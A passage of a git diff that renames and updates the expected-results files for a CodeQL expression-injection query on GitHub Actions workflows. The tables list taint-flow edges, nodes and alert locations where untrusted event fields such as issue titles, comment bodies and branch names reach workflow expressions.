github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | -| action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref deleted file mode 100644 index edaea6fbb21..00000000000 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/ExpressionInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected similarity index 70% rename from ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected rename to ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 8236c4d7829..9101c80a595 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -3,6 +3,7 @@ edges | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | @@ -63,10 +64,15 @@ nodes | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | @@ -194,73 +200,77 @@ nodes | action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | steps.remove_quotations.outputs.replaced | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | github.event.comment.body | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | github.event.comment.body | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | github.event.issue.body | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | github.event.issue.title | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | github.event.comment.body | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | github.event.issue.body | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | github.event.comment.body | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | env.ISSUE_BODY_PARSED | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | env.pr_message | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | github.event.discussion.title | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | github.event.discussion.body | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | github.event.discussion.title | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | github.event.discussion.body | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | github.event.comment.body | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | github.event.pages[1].title | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | github.event.pages[11].title | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | github.event.pages[0].page_name | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | github.event.pages[2222].page_name | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | steps.trim-url.outputs.trimmed_url | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | github.event.issue.title | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | github.event.issue.body | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | env.global_env | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | env.job_env | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | env.step_env | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | github.event.pull_request.title | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | github.event.pull_request.body | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | github.event.review.body | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | github.event.pull_request.title | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | github.event.pull_request.body | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | github.event.comment.body | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | github.event.pull_request.title | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | github.event.pull_request.body | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | github.head_ref | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | github.event.commits[11].message | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | github.event.commits[11].author.email | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | github.event.commits[11].author.name | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | github.event.head_commit.message | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | github.event.head_commit.author.email | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | github.event.head_commit.author.name | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | github.event.head_commit.committer.email | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | github.event.head_commit.committer.name | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | github.event.commits[11].committer.email | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | github.event.commits[11].committer.name | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | steps.summary.outputs.value | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | steps.step.outputs.value | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | needs.job1.outputs['job_output'] | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | github.event.workflow_run.display_title | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | github.event.workflow_run.head_commit.message | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | 